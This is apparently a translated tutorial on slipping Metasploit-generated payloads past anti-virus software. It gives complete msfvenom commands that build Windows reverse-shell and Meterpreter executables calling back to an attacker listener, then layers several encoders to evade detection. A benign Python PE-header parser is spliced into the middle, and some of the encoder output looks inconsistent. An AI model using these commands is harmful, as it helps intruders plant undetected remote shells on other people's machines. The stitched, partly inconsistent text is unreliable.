Anti-virus evasion for msf-generated attack payloads

Using the MSF encoder

One of the best ways to avoid detection is to re-encode the payload file we generate with the MSF encoder (integrated into the msfvenom utility). The MSF encoder is a very practical tool: it changes the shape of the code inside an executable so that anti-virus software no longer recognises its original form, while the program's functionality is not affected at all. Much like re-encoding an e-mail attachment with Base64, the MSF encoder encodes the original executable and produces a new binary file. When this file runs, the decoding routine the MSF encoder embedded in it decodes the original program into memory and executes it.

We can run msfvenom -h to see the MSF encoder's various options; the most important of these are the ones that concern the encoding format. In what follows we use msfvenom -l encoders to list all available encoders. Note, however, that different encoders are intended for different operating-system platforms: because the architectures differ, a file produced by a PowerPC (PPC) encoder will not work on an x86 platform.

root@bogon:~# msfvenom -l encoders

Framework Encoders
==================

    Name                          Rank       Description
    ----                          ----       -----------
    cmd/echo                      good       Echo Command Encoder
    cmd/generic_sh                manual     Generic Shell Variable Substitution Command Encoder
    cmd/ifs                       low        Generic ${IFS} Substitution Command Encoder
    cmd/perl                      normal     Perl Command Encoder
    cmd/powershell_base64         excellent  Powershell Base64 Command Encoder
    cmd/printf_php_mq             manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/eicar                 manual     The EICAR Encoder
    generic/none                  normal     The "none" Encoder
    mipsbe/byte_xori              normal     Byte XORi Encoder
    mipsbe/longxor                normal     XOR Encoder
    mipsle/byte_xori              normal     Byte XORi Encoder
    mipsle/longxor                normal     XOR Encoder
    php/base64                    great      PHP Base64 Encoder
    ppc/longxor                   normal     PPC LongXOR Encoder
    ppc/longxor_tag               normal     PPC LongXOR Encoder
    sparc/longxor_tag             normal     SPARC DWORD XOR Encoder
    x64/xor                       normal     XOR Encoder
    x64/zutto_dekiru              manual     Zutto Dekiru
    x86/add_sub                   manual     Add/Sub Encoder
    ……
    x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit         manual     Single Static Bit
    x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

Now we encode the MSF payload: we feed the raw output of the MSF payload generator into the MSF encoder and then check whether the resulting executable is still detected by anti-virus software. The commands and their output are shown below:

root@bogon:~# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.128 LPORT=31337 -e x86/shikata_ga_nai -f exe -o /root/payload2.exe             ①
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe file: 73802 bytes
Saved as: /root/payload2.exe

root@bogon:~# file payload2.exe                                    ②
payload2.exe: PE32 executable (GUI) Intel 80386, for MS Windows

In the msfvenom options we use -p to specify the payload module, -e to select the x86/shikata_ga_nai encoder, -f to tell the MSF encoder that the output format is exe, and -o to name the output file payload2.exe, saved under /root.

Finally, we run a quick file-type check on the generated file to make sure it is in Windows executable format; the result tells us the file is fine. Unfortunately, however, once we copy payload2.exe to our Windows host it still does not escape the anti-virus scanner. This is not surprising: only the payload body is transformed, the decoding routine the encoder prepends is itself well known to scanners, and the original payload is reconstructed unchanged in memory when the file runs.
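The quick type check at step ② can be reproduced without the file utility, which is handy when triaging a sample on a host that lacks it. The following Python script is an added example, not part of the original post or of Metasploit: it reads the DOS, COFF and optional headers of a PE image and reports the same three facts that file prints (PE32 or PE32+, subsystem, machine). The sample image it builds is constructed for offline testing and consists of headers only, not a real program; MACHINE_NAMES, SUBSYSTEM_NAMES, pe_type, describe and build_sample are names chosen here.

```python
import struct
from typing import Dict

# Values from the PE/COFF specification; names chosen to match what `file` prints.
MACHINE_NAMES = {0x014c: "Intel 80386", 0x8664: "x86-64", 0x01c0: "ARM", 0xaa64: "ARM64"}
SUBSYSTEM_NAMES = {1: "native", 2: "GUI", 3: "console"}


def pe_type(data: bytes) -> Dict[str, str]:
    """Return format, machine and subsystem of a PE image; ValueError if it is not one."""
    if len(data) < 64 or data[:2] != b"MZ":
        raise ValueError("no MZ (DOS) header")
    e_lfanew = struct.unpack_from("<I", data, 0x3c)[0]      # offset of the PE signature
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4                                      # 20-byte COFF file header
    machine, _nsec, _ts, _symtab, _nsym, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                                          # optional header follows COFF
    if opt_size < 70 or len(data) < opt + 70:
        raise ValueError("optional header missing or truncated")
    magic = struct.unpack_from("<H", data, opt)[0]           # 0x10b = PE32, 0x20b = PE32+
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]  # same offset in PE32 and PE32+
    return {
        "format": {0x10b: "PE32", 0x20b: "PE32+"}.get(magic, "unknown(0x%x)" % magic),
        "machine": MACHINE_NAMES.get(machine, "unknown(0x%x)" % machine),
        "subsystem": SUBSYSTEM_NAMES.get(subsystem, "unknown(%d)" % subsystem),
    }


def describe(data: bytes) -> str:
    """One-line summary in the style of `file` output shown at step ② above."""
    t = pe_type(data)
    return "%s executable (%s) %s, for MS Windows" % (t["format"], t["subsystem"], t["machine"])


def build_sample(machine: int = 0x014c, magic: int = 0x10b, subsystem: int = 2) -> bytes:
    """Constructed test image: DOS stub, PE signature, COFF and optional header, no sections."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3c, 64)                    # e_lfanew -> right after DOS header
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 68, subsystem)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read(4096) if len(sys.argv) > 1 else build_sample()
    print(describe(data))
```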

In that case we can apply several rounds of encoding:

root@bogon:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.128 lport=31337 -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 10 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -i 10 -f exe -o /root/payload3.exe ①
Attempting to read payload from STDIN...
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
……
x86/shikata_ga_nai succeeded with size 576 (iteration=8)
x86/shikata_ga_nai succeeded with size 603 (iteration=9)
x86/shikata_ga_nai chosen with final size 603
Payload size: 603 bytes
/usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb:72:in `not_after=': bignum too big to convert into `long' (RangeError)
	from /usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb:72:in `generate_cert'
	from /usr/share/metasploit-framework/modules/payloads/stagers/android/reverse_http.rb:56:in `generate_jar'
	from /usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb:27:in `generate'
	from /usr/share/metasploit-framework/lib/msf/core/payload.rb:200:in `size'
	from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:158:in `block (2 levels) in recalculate'
	……
	from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:115:in `each'
	from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:115:in `load_modules'
	from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
	from /usr/bin/msfvenom:39:in `init_framework'
	from /usr/bin/msfvenom:48:in `framework'
	from /usr/bin/msfvenom:334:in `<main>'
/usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb:72:in `not_after=': bignum too big to convert into `long' (RangeError)
	from /usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb:72:in `generate_cert'
	from /usr/share/metasploit-framework/modules/payloads/stagers/android/reverse_tcp.rb:55:in `generate_jar'
	from /usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb:27:in `generate'
	from /usr/share/metasploit-framework/lib/msf/core/payload.rb:200:in `size'
	from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:158:in `block (2 levels) in recalculate'
	……
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
	from /usr/bin/msfvenom:39:in `init_framework'
	from /usr/bin/msfvenom:48:in `framework'
	from /usr/bin/msfvenom:334:in `<main>'
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/countdown
x86/countdown succeeded with size 16 (iteration=0)
x86/countdown succeeded with size 32 (iteration=1)
……
x86/countdown succeeded with size 161 (iteration=9)
x86/countdown chosen with final size 161
Payload size: 161 bytes
Final size of exe file: 73802 bytes
Saved as: /root/payload3.exe

If the file still fails to get past the anti-virus scanner at this point, we can instead customise the executable template.
